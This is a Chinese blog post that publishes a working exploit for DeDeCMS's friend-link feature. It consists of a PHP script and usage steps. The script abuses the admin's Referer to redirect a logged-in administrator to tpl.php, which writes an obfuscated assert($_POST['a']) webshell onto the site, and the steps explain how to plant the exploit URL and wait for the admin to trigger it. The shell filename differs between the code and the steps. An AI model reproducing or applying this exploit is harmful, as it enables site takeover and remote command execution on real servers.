DeDeCMS友链Getshell

DEDECMS的一个漏洞

0x00 漏洞详情

http://0day5.com/archives/4209/


0x01 EXP

<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);
$muma = '<'.'?'.'a'.'s'.'s'.'e'.'r'.'t'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'a'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

0x02 利用方法

  1. 保存上方exp,上传至服务器;

  2. 访问目标网站:http://www.test.com/plus/flink.php 链接填写部署的exp的URL;

  3. 等待管理员触发,得到shell地址http://www.test.com/include/taglib/dy.lib.php

发表评论 / Comment

用心评论~


Warning: Cannot modify header information - headers already sent by (output started at /www/wwwroot/blog.dyboy.cn/content/templates/dyblog/footer.php:56) in /www/wwwroot/blog.dyboy.cn/include/lib/view.php on line 23